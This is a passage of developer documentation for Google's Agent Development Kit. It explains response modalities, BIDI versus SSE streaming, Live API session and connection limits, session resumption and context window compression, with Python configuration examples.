Response modalities control how the model generates output: as text or audio. Both Gemini Live API and Vertex AI Live API have the same restriction: only one response modality per session.
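The one-modality rule can be checked in application code before a session is opened. The following is a minimal sketch, not an ADK API: `validate_response_modalities` and `ALLOWED_MODALITIES` are hypothetical names introduced for illustration, and the set of accepted values is limited to the two modalities discussed in this section.

```python
# Hypothetical pre-flight check; not part of ADK.
ALLOWED_MODALITIES = {"TEXT", "AUDIO"}


def validate_response_modalities(modalities: list) -> str:
    """Return the single normalized modality, or raise ValueError if invalid."""
    if len(modalities) != 1:
        raise ValueError(
            f"Exactly one response modality is allowed per session, got {modalities}"
        )
    modality = modalities[0].upper()
    if modality not in ALLOWED_MODALITIES:
        raise ValueError(f"Unsupported response modality: {modality}")
    return modality


print(validate_response_modalities(["AUDIO"]))
```

Failing fast in your own code gives a clearer error than waiting for the Live API to reject the session.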
**Configuration:**

```python
# Phase 2: Session initialization - RunConfig determines streaming behavior

# Default behavior: ADK automatically sets response_modalities to ["AUDIO"]
# when not specified (required by native audio models)
run_config = RunConfig(
    streaming_mode=StreamingMode.BIDI  # Bidirectional WebSocket communication
)

# The above is equivalent to:
run_config = RunConfig(
    response_modalities=["AUDIO"],  # Automatically set by ADK in run_live()
    streaming_mode=StreamingMode.BIDI  # Bidirectional WebSocket communication
)

# ✅ CORRECT: Text-only responses
run_config = RunConfig(
    response_modalities=["TEXT"],  # Model responds with text only
    streaming_mode=StreamingMode.BIDI  # Still uses bidirectional streaming
)

# ✅ CORRECT: Audio-only responses (explicit)
run_config = RunConfig(
    response_modalities=["AUDIO"],  # Model responds with audio only
    streaming_mode=StreamingMode.BIDI  # Bidirectional WebSocket communication
)
```

Both Gemini Live API and Vertex AI Live API restrict sessions to a single response modality. Attempting to use both will result in an API error:

```python
# ❌ INCORRECT: Both modalities not supported
run_config = RunConfig(
    response_modalities=["TEXT", "AUDIO"],  # ERROR: Cannot use both
    streaming_mode=StreamingMode.BIDI
)
# Error from Live API: "Only one response modality is supported per session"
```

**Default Behavior:**

When `response_modalities` is not specified, ADK's `run_live()` method automatically sets it to `["AUDIO"]` because native audio models require an explicit response modality. You can override this by explicitly setting `response_modalities=["TEXT"]` if needed.

**Key constraints:**

- You must choose either `TEXT` or `AUDIO` at session start. **Cannot switch between modalities mid-session**
- You must choose `AUDIO` for [Native Audio models](https://google.github.io/adk-docs/streaming/dev-guide/part5/#understanding-audio-model-architectures). If you want to receive both audio and text responses from native audio models, use the Audio Transcript feature which provides text transcripts of the audio output. See [Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription) for details
- Response modality only affects model output; **you can always send text, voice, or video input (if the model supports those input modalities)** regardless of the chosen response modality

## StreamingMode: BIDI or SSE

ADK supports two distinct streaming modes that use different API endpoints and protocols:

- `StreamingMode.BIDI`: ADK uses WebSocket to connect to the **Live API** (the bidirectional streaming endpoint via `live.connect()`)
- `StreamingMode.SSE`: ADK uses HTTP streaming to connect to the **standard Gemini API** (the unary/streaming endpoint via `generate_content_async()`)

"Live API" refers specifically to the bidirectional WebSocket endpoint (`live.connect()`), while "Gemini API" or "standard Gemini API" refers to the traditional HTTP-based endpoint (`generate_content()` / `generate_content_async()`). Both are part of the broader Gemini API platform but use different protocols and capabilities.

**Note:** These modes refer to the **ADK-to-Gemini API communication protocol**, not your application's client-facing architecture. You can build WebSocket servers, REST APIs, SSE endpoints, or any other architecture for your clients with either mode.

This guide focuses on `StreamingMode.BIDI`, which is required for real-time audio/video interactions and Live API features. However, it's worth understanding the differences between BIDI and SSE modes to choose the right approach for your use case.
**Configuration:** ```python from google.adk.agents.run_config import RunConfig, StreamingMode # BIDI streaming for real-time audio/video run_config = RunConfig( streaming_mode=StreamingMode.BIDI, response_modalities=["AUDIO"] # Supports audio/video modalities ) # SSE streaming for text-based interactions run_config = RunConfig( streaming_mode=StreamingMode.SSE, response_modalities=["TEXT"] # Text-only modality ) ``` ### Protocol and Implementation Differences The two streaming modes differ fundamentally in their communication patterns and capabilities. BIDI mode enables true bidirectional communication where you can send new input while receiving model responses, while SSE mode follows a traditional request-then-response pattern where you send a complete request and stream back the response. **StreamingMode.BIDI - Bidirectional WebSocket Communication:** BIDI mode establishes a persistent WebSocket connection that allows simultaneous sending and receiving. This enables real-time features like interruptions, live audio streaming, and immediate turn-taking: ``` sequenceDiagram participant App as Your Application participant ADK as ADK participant Queue as LiveRequestQueue participant Gemini as Gemini Live API Note over ADK,Gemini: Protocol: WebSocket App->>ADK: runner.run_live(run_config) ADK->>Gemini: live.connect() - WebSocket activate Gemini Note over ADK,Queue: Can send while receiving App->>Queue: send_content(text) Queue->>Gemini: → Content (via WebSocket) App->>Queue: send_realtime(audio) Queue->>Gemini: → Audio blob (via WebSocket) Gemini-->>ADK: ← Partial response (partial=True) ADK-->>App: ← Event: partial text/audio Gemini-->>ADK: ← Partial response (partial=True) ADK-->>App: ← Event: partial text/audio App->>Queue: send_content(interrupt) Queue->>Gemini: → New content Gemini-->>ADK: ← turn_complete=True ADK-->>App: ← Event: turn complete deactivate Gemini Note over ADK,Gemini: Turn Detection: turn_complete flag ``` **StreamingMode.SSE - Unidirectional 
HTTP Streaming:** SSE (Server-Sent Events) mode uses HTTP streaming where you send a complete request upfront, then receive the response as a stream of chunks. This is a simpler, more traditional pattern suitable for text-based chat applications: ``` sequenceDiagram participant App as Your Application participant ADK as ADK participant Gemini as Gemini API Note over ADK,Gemini: Protocol: HTTP App->>ADK: runner.run(run_config) ADK->>Gemini: generate_content_stream() - HTTP activate Gemini Note over ADK,Gemini: Request sent completely, then stream response Gemini-->>ADK: ← Partial chunk (partial=True) ADK-->>App: ← Event: partial text Gemini-->>ADK: ← Partial chunk (partial=True) ADK-->>App: ← Event: partial text Gemini-->>ADK: ← Partial chunk (partial=True) ADK-->>App: ← Event: partial text Gemini-->>ADK: ← Final chunk (finish_reason=STOP) ADK-->>App: ← Event: complete response deactivate Gemini Note over ADK,Gemini: Turn Detection: finish_reason ``` ### Progressive SSE Streaming **Progressive SSE streaming** is a feature that enhances how SSE mode delivers streaming responses. 
This feature improves response aggregation by: - **Content ordering preservation**: Maintains the original order of mixed content types (text, function calls, inline data) - **Intelligent text merging**: Only merges consecutive text parts of the same type (regular text vs thought text) - **Progressive delivery**: Marks all intermediate chunks as `partial=True`, with a single final aggregated response at the end - **Deferred function execution**: Skips executing function calls in partial events, only executing them in the final aggregated event to ensure parallel function calls are executed together rather than sequentially - **Function call argument streaming**: Supports progressive building of function call arguments through `partial_args`, enabling real-time display of function call construction **Default Behavior:** When you use `StreamingMode.SSE`, progressive SSE streaming is **enabled by default**. This means you automatically benefit from these improvements without any additional configuration. 
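The ordering and merging rules above can be illustrated with a minimal sketch. This is not ADK's implementation: `Part` and `merge_parts` are hypothetical names invented for this example, and the only goal is to show what "merge consecutive text parts of the same type while preserving order" means in practice.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Part:
    """Hypothetical stand-in for a streamed content part (not an ADK type)."""
    text: Optional[str] = None           # text payload, if this is a text part
    thought: bool = False                # True for thought text, False for regular text
    function_call: Optional[str] = None  # function name, if this is a call part


def merge_parts(parts: List[Part]) -> List[Part]:
    """Merge only consecutive text parts of the same kind, keeping order."""
    merged: List[Part] = []
    for part in parts:
        prev = merged[-1] if merged else None
        same_kind_text = (
            part.text is not None
            and prev is not None
            and prev.text is not None
            and prev.thought == part.thought
        )
        if same_kind_text:
            # Extend the previous text part instead of appending a new one.
            merged[-1] = Part(text=prev.text + part.text, thought=part.thought)
        else:
            # Function calls and kind changes start a new entry, so the
            # original ordering of mixed content is preserved.
            merged.append(part)
    return merged


chunks = [
    Part(text="Let me ", thought=True),
    Part(text="check.", thought=True),
    Part(text="Looking up "),
    Part(text="the weather."),
    Part(function_call="get_weather"),
    Part(text="Done."),
]
final = merge_parts(chunks)
for part in final:
    print(part)
```

In this toy model the two thought chunks collapse into one part, the two regular text chunks collapse into another, and the function call stays between the surrounding text parts rather than being moved to the end.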
**Disabling the feature (if needed):**

If you need to revert to the legacy SSE streaming behavior (simple text accumulation), you can disable it via environment variable:

```bash
export ADK_DISABLE_PROGRESSIVE_SSE_STREAMING=1
```

**Legacy Behavior Trade-offs:** Disabling progressive SSE streaming reverts to simple text accumulation, which:

- May lose original content ordering when mixing text and function calls
- Does not support function call argument streaming via `partial_args`
- Is provided for backward compatibility only; new applications should use the default progressive mode

**When progressive SSE streaming helps:**

- You're using `StreamingMode.SSE` and have mixed content types (text + function calls)
- Your responses include thought text (extended thinking) mixed with regular text
- You want to ensure function calls execute only once after complete response aggregation
- You need to display function call construction in real-time as arguments stream in

**Note:** This feature only affects `StreamingMode.SSE`. It does not apply to `StreamingMode.BIDI` (the focus of this guide), which uses the Live API's native bidirectional protocol.

### When to Use Each Mode

Your choice between BIDI and SSE depends on your application requirements and the interaction patterns you need to support.
Here's a practical guide to help you choose: **Use BIDI when:** - Building voice/video applications with real-time interaction - Need bidirectional communication (send while receiving) - Require Live API features (audio transcription, VAD, proactivity, affective dialog) - Supporting interruptions and natural turn-taking (see [Part 3: Handling Interrupted Flag](https://google.github.io/adk-docs/streaming/dev-guide/part3/#handling-interrupted-flag)) - Implementing live streaming tools or real-time data feeds - Can plan for concurrent session quotas (50-1,000 sessions depending on platform/tier) **Use SSE when:** - Building text-based chat applications - Standard request/response interaction pattern - Using models without Live API support (e.g., Gemini 1.5 Pro, Gemini 1.5 Flash) - Simpler deployment without WebSocket requirements - Need larger context windows (Gemini 1.5 supports up to 2M tokens) - Prefer standard API rate limits (RPM/TPM) over concurrent session quotas Streaming Mode and Model Compatibility SSE mode uses the standard Gemini API (`generate_content_async`) via HTTP streaming, while BIDI mode uses the Live API (`live.connect()`) via WebSocket. Gemini 1.5 models (Pro, Flash) don't support the Live API protocol and therefore must be used with SSE mode. Gemini 2.0/2.5 Live models support both protocols but are typically used with BIDI mode to access real-time audio/video features. ### Standard Gemini Models (1.5 Series) Accessed via SSE While this guide focuses on Bidi-streaming with Gemini 2.0 Live models, ADK also supports the Gemini 1.5 model family through SSE streaming. These models offer different trade-offs—larger context windows and proven stability, but without real-time audio/video features. 
Here's what the 1.5 series supports when accessed via SSE: **Models:** - `gemini-1.5-pro` - `gemini-1.5-flash` **Supported:** - ✅ Text input/output (`response_modalities=["TEXT"]`) - ✅ SSE streaming (`StreamingMode.SSE`) - ✅ Function calling with automatic execution - ✅ Large context windows (up to 2M tokens for 1.5-pro) **Not Supported:** - ❌ Live audio features (audio I/O, transcription, VAD) - ❌ Bidi-streaming via `run_live()` - ❌ Proactivity and affective dialog - ❌ Video input ## Understanding Live API Connections and Sessions When building ADK Bidi-streaming applications, it's essential to understand how ADK manages the communication layer between itself and the Live API backend. This section explores the fundamental distinction between **connections** (the WebSocket transport links that ADK establishes to Live API) and **sessions** (the logical conversation contexts maintained by Live API). Unlike traditional request-response APIs, the Bidi-streaming architecture introduces unique constraints: connection timeouts, session duration limits that vary by modality (audio-only vs audio+video), finite context windows, and concurrent session quotas that differ between Gemini Live API and Vertex AI Live API. ### ADK `Session` vs Live API Session Understanding the distinction between **ADK `Session`** and **Live API session** is crucial for building reliable streaming applications with ADK Bidi-streaming. 
**ADK `Session`** (managed by SessionService):

- Persistent conversation storage for conversation history, events, and state, created via `SessionService.create_session()`
- Storage options: in-memory, database (PostgreSQL/MySQL/SQLite), or Vertex AI
- Survives across multiple `run_live()` calls and application restarts (with a persistent `SessionService`)

**Live API session** (managed by Live API backend):

- Maintained by the Live API while the `run_live()` event loop is running, and destroyed when streaming ends after `LiveRequestQueue.close()` is called
- Subject to platform duration limits, and can be resumed across multiple connections using session resumption handles (see [How ADK Manages Session Resumption](#how-adk-manages-session-resumption) below)

**How they work together:**

1. **When `run_live()` is called:**
    1. Retrieves the ADK `Session` from `SessionService`
    1. Initializes the Live API session with conversation history from `session.events`
    1. Streams events bidirectionally with the Live API backend
    1. Updates the ADK `Session` with new events as they occur
1. **When `run_live()` ends:**
    1. The Live API session terminates
    1. The ADK `Session` persists
1. **When `run_live()` is called again** or **the application is restarted**:
    - ADK loads the history from the ADK `Session`
    - Creates a new Live API session with that context

In short, ADK `Session` provides persistent, long-term conversation storage, while Live API sessions are ephemeral streaming contexts. This separation enables production applications to maintain conversation continuity across network interruptions, application restarts, and multiple streaming sessions.

The following diagram illustrates the relationship between ADK Session persistence and ephemeral Live API session contexts, showing how conversation history is maintained across multiple `run_live()` calls:

```
sequenceDiagram
    participant App as Your Application
    participant SS as SessionService
    participant ADK_Session as ADK Session (Persistent Storage)
    participant ADK as ADK (run_live)
    participant LiveSession as Live API Session (Ephemeral)

    Note over App,LiveSession: First run_live() call
    App->>SS: get_session(user_id, session_id)
    SS->>ADK_Session: Load session data
    ADK_Session-->>SS: Session with events history
    SS-->>App: Session object
    App->>ADK: runner.run_live(...)
    ADK->>LiveSession: Initialize with history from ADK Session
    activate LiveSession
    Note over ADK,LiveSession: Bidirectional streaming...
    ADK->>ADK_Session: Update with new events
    App->>ADK: queue.close()
    ADK->>LiveSession: Terminate
    deactivate LiveSession
    Note over LiveSession: Live API session destroyed
    Note over ADK_Session: ADK Session persists

    Note over App,LiveSession: Second run_live() call (or after restart)
    App->>SS: get_session(user_id, session_id)
    SS->>ADK_Session: Load session data
    ADK_Session-->>SS: Session with events history
    SS-->>App: Session object (with previous history)
    App->>ADK: runner.run_live(...)
    ADK->>LiveSession: Initialize new session with full history
    activate LiveSession
    Note over ADK,LiveSession: Bidirectional streaming continues...
```

**Key insights:**

- ADK Session survives across multiple `run_live()` calls and app restarts
- Live API session is ephemeral - created and destroyed per streaming session
- Conversation continuity is maintained through ADK Session's persistent storage
- SessionService manages the persistence layer (in-memory, database, or Vertex AI)

Now that we understand the difference between ADK `Session` objects and Live API sessions, let's focus on Live API connections and sessions: the backend infrastructure that powers real-time bidirectional streaming.

### Live API Connections and Sessions

Understanding the distinction between **connections** and **sessions** at the Live API level is crucial for building reliable ADK Bidi-streaming applications.

**Connection**: The physical WebSocket link between ADK and the Live API server. This is the network transport layer that carries bidirectional streaming data.
**Session**: The logical conversation context maintained by the Live API, including conversation history, tool call state, and model context. A session can span multiple connections.

| **Aspect** | **Connection** | **Session** |
| ------------------ | ---------------------------- | ----------------------------------- |
| **What is it?** | WebSocket network connection | Logical conversation context |
| **Scope** | Transport layer | Application layer |
| **Can span?** | Single network link | Multiple connections via resumption |
| **Failure impact** | Network error or timeout | Lost conversation history |

#### Live API Connection and Session Limits by Platform

Understanding the constraints of each platform is critical for production planning. Gemini Live API and Vertex AI Live API have different limits that affect how long conversations can run and how many users can connect simultaneously. The most important distinction is between **connection duration** (how long a single WebSocket connection stays open) and **session duration** (how long a logical conversation can continue).

| Constraint Type | Gemini Live API (Google AI Studio) | Vertex AI Live API (Google Cloud) | Notes |
| ------------------------------------ | ---------------------------------- | --------------------------------- | ----- |
| **Connection duration** | ~10 minutes | Not documented separately | Each Gemini WebSocket connection auto-terminates; ADK reconnects transparently with session resumption |
| **Session Duration (Audio-only)** | 15 minutes | 10 minutes | Maximum session duration without context window compression. Both platforms: unlimited with context window compression enabled |
| **Session Duration (Audio + video)** | 2 minutes | 10 minutes | Gemini has shorter limit for video; Vertex treats all sessions equally. Both platforms: unlimited with context window compression enabled |
| **Concurrent sessions** | 50 (Tier 1); 1,000 (Tier 2+) | Up to 1,000 | Gemini limits vary by API tier; Vertex limit is per Google Cloud project |

**Source References:**

- [Gemini Live API Capabilities Guide](https://ai.google.dev/gemini-api/docs/live-guide)
- [Gemini API Quotas](https://ai.google.dev/gemini-api/docs/quota)
- [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)

## Live API Session Resumption

By default, the Live API limits connection duration to approximately 10 minutes: each WebSocket connection automatically closes after this duration. To overcome this limit and enable longer conversations, the **Live API provides [Session Resumption](https://ai.google.dev/gemini-api/docs/live#session-resumption)**, a feature that transparently migrates a session across multiple connections. When enabled, the Live API generates resumption handles that allow reconnecting to the same session context, preserving the full conversation history and state.

**ADK automates this entirely**: When you enable session resumption in RunConfig, ADK automatically handles all reconnection logic: detecting connection closures, caching resumption handles, and reconnecting seamlessly in the background. You don't need to write any reconnection code. Sessions continue seamlessly beyond the 10-minute connection limit, and ADK handles connection timeouts, network disruptions, and planned reconnections automatically.

### Scope of ADK's Reconnection Management

ADK manages the **ADK-to-Live API connection** (the WebSocket between ADK and the Gemini/Vertex Live API backend). This is transparent to your application code.
**Your application remains responsible for**:

- Managing client connections to your application (e.g., user's WebSocket to your FastAPI server)
- Implementing client-side reconnection logic if needed
- Handling network failures between clients and your application

When ADK reconnects to the Live API, your application's event loop continues normally: you keep receiving events from `run_live()` without interruption. From your application's perspective, the Live API session continues seamlessly.

**Configuration:**

```python
from google.genai import types
from google.adk.agents.run_config import RunConfig

# Enable session resumption; ADK handles reconnection automatically
run_config = RunConfig(
    session_resumption=types.SessionResumptionConfig()
)
```

**When NOT to Enable Session Resumption:**

While session resumption is recommended for most production applications, consider these scenarios where you might not need it:

- **Short sessions (\<10 minutes)**: If your sessions typically complete within the ~10 minute connection timeout, resumption adds unnecessary overhead
- **Stateless interactions**: Request-response style interactions where each turn is independent don't benefit from session continuity
- **Development/testing**: Simpler debugging when each session starts fresh without carrying over state
- **Cost-sensitive deployments**: Session resumption may incur additional platform costs or resource usage (verify with your platform)

**Best practice**: Enable session resumption by default for production, disable only when you have a specific reason not to use it.

### How ADK Manages Session Resumption

While session resumption is supported by both Gemini Live API and Vertex AI Live API, using it directly requires managing resumption handles, detecting connection closures, and implementing reconnection logic. ADK takes full responsibility for this complexity, automatically utilizing session resumption behind the scenes so developers don't need to write any reconnection code. You simply enable it in RunConfig, and ADK handles everything transparently.

**ADK's automatic management:**

1.
**Initial Connection**: ADK establishes a WebSocket connection to Live API 1. **Handle Updates**: Throughout the session, the Live API sends `session_resumption_update` messages containing updated handles. ADK automatically caches the latest handle in `InvocationContext.live_session_resumption_handle` 1. **Graceful Connection Close**: When the ~10 minute connection limit is reached, the WebSocket closes gracefully (no exception) 1. **Automatic Reconnection**: ADK's internal loop detects the close and automatically reconnects using the most recent cached handle 1. **Session Continuation**: The same session continues seamlessly with full context preserved Implementation Detail During reconnection, ADK retrieves the cached handle from `InvocationContext.live_session_resumption_handle` and includes it in the new `LiveConnectConfig` for the `live.connect()` call. This is handled entirely by ADK's internal reconnection loop—developers never need to access or manage these handles directly. ### Sequence Diagram: Automatic Reconnection The following sequence diagram illustrates how ADK automatically manages Live API session resumption when the ~10 minute connection timeout is reached. 
ADK detects the graceful close, retrieves the cached resumption handle, and reconnects transparently without application code changes: ``` sequenceDiagram participant App as Your Application participant ADK as ADK (run_live) participant WS as WebSocket Connection participant API as Live API (Gemini/Vertex AI) participant LiveSession as Live Session Context Note over App,LiveSession: Initial Connection (with session resumption enabled) App->>ADK: runner.run_live(run_config=RunConfig(session_resumption=...)) ADK->>API: WebSocket connect() activate WS API->>LiveSession: Create new session activate LiveSession Note over ADK,API: Bidirectional Streaming (0-10 minutes) App->>ADK: send_content(text) / send_realtime(audio) ADK->>API: → Content via WebSocket API->>LiveSession: Update conversation history API-->>ADK: ← Streaming response ADK-->>App: ← yield event Note over API,LiveSession: Live API sends resumption handle updates API-->>ADK: session_resumption_update { new_handle: "abc123" } ADK->>ADK: Cache handle in InvocationContext Note over WS,API: ~10 minutes elapsed - Connection timeout API->>WS: Close WebSocket (graceful close) deactivate WS Note over LiveSession: Session context preserved Note over ADK: Graceful close detected - No exception raised ADK->>ADK: while True loop continues Note over ADK,API: Automatic Reconnection ADK->>API: WebSocket connect(session_resumption.handle="abc123") activate WS API->>LiveSession: Attach to existing session API-->>ADK: Session resumed with full context Note over ADK,API: Bidirectional Streaming Continues App->>ADK: send_content(text) / send_realtime(audio) ADK->>API: → Content via WebSocket API->>LiveSession: Update conversation history API-->>ADK: ← Streaming response ADK-->>App: ← yield event Note over App,LiveSession: Session continues until duration limit or explicit close deactivate WS deactivate LiveSession ``` Events and Session Persistence For details on which events are saved to the ADK `Session` versus which are only 
yielded during streaming, see [Part 3: Events Saved to ADK Session](https://google.github.io/adk-docs/streaming/dev-guide/part3/#events-saved-to-adk-session). ## Live API Context Window Compression **Problem:** Live API sessions face two critical constraints that limit conversation duration. First, **session duration limits** impose hard time caps: without compression, Gemini Live API limits audio-only sessions to 15 minutes and audio+video sessions to just 2 minutes, while Vertex AI limits all sessions to 10 minutes. Second, **context window limits** restrict conversation length: models have finite token capacities (128k tokens for `gemini-2.5-flash-native-audio-preview-12-2025`, 32k-128k for Vertex AI models). Long conversations—especially extended customer support sessions, tutoring interactions, or multi-hour voice dialogues—will hit either the time limit or the token limit, causing the session to terminate or lose critical conversation history. **Solution:** [Context window compression](https://ai.google.dev/gemini-api/docs/live-session#context-window-compression) solves both constraints simultaneously. It uses a sliding-window approach to automatically compress or summarize earlier conversation history when the token count reaches a configured threshold. The Live API preserves recent context in full detail while compressing older portions. **Critically, enabling context window compression extends session duration to unlimited time**, removing the session duration limits (15 minutes for audio-only / 2 minutes for audio+video on Gemini Live API; 10 minutes for all sessions on Vertex AI) while also preventing token limit exhaustion. However, there is a trade-off: as the feature summarizes earlier conversation history rather than retaining it all, the detail of past context will be gradually lost over time. The model will have access to compressed summaries of older exchanges, not the full verbatim history. 
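To make the sliding-window idea concrete, the following toy model tracks how a context size might evolve turn by turn. It is only a sketch under simplifying assumptions: the real compression is performed inside the Live API backend, `simulate_sliding_window` is a hypothetical helper, and the parameter names simply mirror the `trigger_tokens` and `target_tokens` settings described later in this section.

```python
from typing import List, Tuple


def simulate_sliding_window(
    turn_tokens: List[int],
    trigger_tokens: int,
    target_tokens: int,
) -> Tuple[List[int], int]:
    """Toy model: return context size after each turn and the compression count.

    Assumption: compression is checked once per turn and shrinks the context
    to at most target_tokens. The real backend may behave differently.
    """
    context = 0
    compressions = 0
    sizes: List[int] = []
    for tokens in turn_tokens:
        context += tokens
        if context >= trigger_tokens:
            # Older history is summarized; only the recent window stays verbatim.
            context = min(context, target_tokens)
            compressions += 1
        sizes.append(context)
    return sizes, compressions


# Five turns of 30k tokens each against a 100k trigger and an 80k target.
sizes, compressions = simulate_sliding_window([30_000] * 5, 100_000, 80_000)
print(sizes)         # [30000, 60000, 90000, 80000, 80000]
print(compressions)  # 2
```

The context size stays bounded no matter how many turns follow, which is why the token limit stops being the constraint; the cost is that each compression discards verbatim detail from the oldest turns.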
### Platform Behavior and Official Limits

Session duration management and context window compression are **Live API platform features**. ADK configures these features via RunConfig and passes the configuration to the Live API, but the actual enforcement and implementation are handled by the Gemini/Vertex AI Live API backends.

**Important**: The duration limits and "unlimited" session behavior mentioned in this guide are based on current Live API behavior. These limits are subject to change by Google. Always verify current session duration limits and compression behavior in the official documentation:

- [Gemini Live API Documentation](https://ai.google.dev/gemini-api/docs/live)
- [Vertex AI Live API Documentation](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)

ADK provides an easy way to configure context window compression through RunConfig. However, developers are responsible for appropriately configuring the compression parameters (`trigger_tokens` and `target_tokens`) based on their specific requirements: model context window size, expected conversation patterns, and quality needs:

```python
from google.genai import types
from google.adk.agents.run_config import RunConfig

# For gemini-2.5-flash-native-audio-preview-12-2025 (128k context window)
run_config = RunConfig(
    context_window_compression=types.ContextWindowCompressionConfig(
        trigger_tokens=100000,  # Start compression at ~78% of 128k context
        sliding_window=types.SlidingWindow(
            target_tokens=80000  # Compress to ~62% of context, preserving recent turns
        )
    )
)
```

**How it works:**

When context window compression is enabled:

1. The Live API monitors the total token count of the conversation context
1. When the context reaches the `trigger_tokens` threshold, compression activates
1. Earlier conversation history is compressed or summarized using a sliding window approach
1. Recent context (last `target_tokens` worth) is preserved in full detail
1. **Two critical effects occur simultaneously:**
    1.
Session duration limits are removed (no more 15-minute/2-minute caps on Gemini Live API or 10-minute caps on Vertex AI) 1. Token limits are managed (sessions can continue indefinitely regardless of conversation length) **Choosing appropriate thresholds:** - Set `trigger_tokens` to 70-80% of your model's context window to allow headroom - Set `target_tokens` to 60-70% to provide sufficient compression - Test with your actual conversation patterns to optimize these values **Parameter Selection Strategy:** The examples above use 78% for `trigger_tokens` and 62% for `target_tokens`. Here's the reasoning: 1. **trigger_tokens at 78%**: Provides a buffer before hitting the hard limit 1. Allows room for the current turn to complete 1. Prevents mid-response compression interruptions 1. Typical conversations can continue for several more turns 1. **target_tokens at 62%**: Leaves substantial room after compression 1. 16 percentage points (78% - 62%) freed up per compression 1. Allows for multiple turns before next compression 1. Balances preservation of context with compression frequency 1. **Adjusting for your use case**: 1. **Long turns** (detailed technical discussions): Increase buffer → 70% trigger, 50% target 1. **Short turns** (quick Q&A): Tighter margins → 85% trigger, 70% target 1. **Context-critical** (requires historical detail): Higher target → 80% trigger, 70% target 1. **Performance-sensitive** (minimize compression overhead): Lower trigger → 70% trigger, 50% target Always test with your actual conversation patterns to find optimal values. 
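The percentage guidance above translates into token counts with simple arithmetic. The helper below is a sketch, not part of ADK: `compression_thresholds` is a hypothetical function, and its defaults (78% and 62%) are just the ratios used in this guide's example.

```python
from typing import Tuple


def compression_thresholds(
    context_window: int,
    trigger_pct: float = 0.78,
    target_pct: float = 0.62,
) -> Tuple[int, int]:
    """Return (trigger_tokens, target_tokens) for a given context window size."""
    if not 0 < target_pct < trigger_pct < 1:
        raise ValueError("expected 0 < target_pct < trigger_pct < 1")
    # round() avoids off-by-one results caused by floating-point representation.
    return round(context_window * trigger_pct), round(context_window * target_pct)


# Default ratios for a 128k-token context window.
default_trigger, default_target = compression_thresholds(128_000)
print(default_trigger, default_target)  # 99840 79360

# "Long turns" profile from the list above: 70% trigger, 50% target.
long_trigger, long_target = compression_thresholds(128_000, 0.70, 0.50)
print(long_trigger, long_target)  # 89600 64000
```

The resulting integers are the values you would pass as `trigger_tokens` and `target_tokens` in the compression configuration; the example configuration in this guide rounds them to 100000 and 80000.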
### When NOT to Use Context Window Compression

While compression enables unlimited session duration, consider these trade-offs:

**Context Window Compression Trade-offs:**

| Aspect | With Compression | Without Compression | Best For |
| -------------------- | ------------------------ | ------------------- | -------- |
| **Session Duration** | Unlimited | Gemini: 15 min (audio), 2 min (video); Vertex: 10 min | Compression: Long sessions; No compression: Short sessions |
| **Context Quality** | Older context summarized | Full verbatim history | Compression: General conversation; No compression: Precision-critical |
| **Latency** | Compression overhead | No overhead | Compression: Async scenarios; No compression: Real-time |
| **Memory Usage** | Bounded | Grows with session | Compression: Long sessions; No compression: Short sessions |
| **Implementation** | Configure thresholds | No configuration | Compression: Production; No compression: Prototypes |

**Common Use Cases:**

✅ **Enable compression when:**

- Sessions need to exceed platform duration limits (15/2/10 minutes)
- Extended conversations may hit token limits (128k for 2.5-flash)
- Customer support sessions that can last hours
- Educational tutoring with long interactions

❌ **Disable compression when:**

- All sessions complete within duration limits
- Precision recall of early conversation is critical
- Development/testing phase (full history aids debugging)
- Quality degradation from summarization is unacceptable

**Best practice**: Enable compression only when you need sessions longer than platform duration limits OR when conversations may exceed context window token limits.
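The best-practice rule above can be written as a small decision helper. This is an illustrative sketch only: `needs_compression` and `SESSION_LIMIT_MINUTES` are hypothetical names, and the limits are copied from the tables in this guide, so they should be re-checked against the official documentation before use.

```python
# Session duration limits in minutes without compression, as quoted in this
# guide. Assumption: these values may change on the platform side.
SESSION_LIMIT_MINUTES = {
    ("gemini", False): 15,  # Gemini Live API, audio-only
    ("gemini", True): 2,    # Gemini Live API, audio + video
    ("vertex", False): 10,  # Vertex AI Live API, all sessions
    ("vertex", True): 10,
}


def needs_compression(
    platform: str,
    uses_video: bool,
    expected_minutes: float,
    expected_tokens: int,
    context_window: int = 128_000,
) -> bool:
    """Return True if a session is expected to exceed a time or token limit."""
    over_time = expected_minutes > SESSION_LIMIT_MINUTES[(platform, uses_video)]
    over_tokens = expected_tokens > context_window
    return over_time or over_tokens


print(needs_compression("gemini", False, 10, 20_000))   # False: within 15 min and 128k
print(needs_compression("gemini", True, 5, 20_000))     # True: exceeds 2-minute video limit
print(needs_compression("vertex", False, 8, 200_000))   # True: exceeds 128k tokens
```

A helper like this only covers the two hard limits; whether summarized history is acceptable for your use case remains a judgment call.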
## Best Practices for Live API Connection and Session Management

### Essential: Enable Session Resumption

- ✅ **Always enable session resumption** in RunConfig for production applications
- ✅ This enables ADK to automatically handle Gemini's ~10 minute connection timeouts transparently
- ✅ Sessions continue seamlessly across multiple WebSocket connections without user interruption
- ✅ ADK takes care of session resumption handle caching and management

```python
from google.genai import types
from google.adk.agents.run_config import RunConfig

run_config = RunConfig(
    response_modalities=["AUDIO"],
    session_resumption=types.SessionResumptionConfig()
)
```

### Recommended: Enable Context Window Compression for Unlimited Sessions

- ✅ **Enable context window compression** if you need sessions longer than 15 minutes (audio-only) or 2 minutes (audio+video)
- ✅ Once enabled, session duration becomes unlimited, so there is no need to monitor time-based limits
- ✅ Configure `trigger_tokens` and `target_tokens` based on your model's context window
- ✅ Test compression settings with realistic conversation patterns
- ⚠️ **Use judiciously**: Compression adds latency during summarization and may lose conversational nuance; only enable it when extended sessions are truly necessary for your use case

```python
from google.genai import types
from google.adk.agents.run_config import RunConfig

run_config = RunConfig(
    response_modalities=["AUDIO"],
    session_resumption=types.SessionResumptionConfig(),
    context_window_compression=types.ContextWindowCompressionConfig(
        trigger_tokens=100000,
        sliding_window=types.SlidingWindow(target_tokens=80000)
    )
)
```

### Optional: Monitor Session Duration

**Only applies if NOT using context window compression:**

- ✅ Focus on **session duration limits**, not connection timeouts (ADK handles those automatically)
- ✅ **Gemini Live API**: Monitor for 15-minute limit (audio-only) or 2-minute limit (audio+video)
- ✅ **Vertex AI Live API**: Monitor for 10-minute session limit
- ✅ Warn users 1-2 minutes before session duration limits
- ✅ Implement
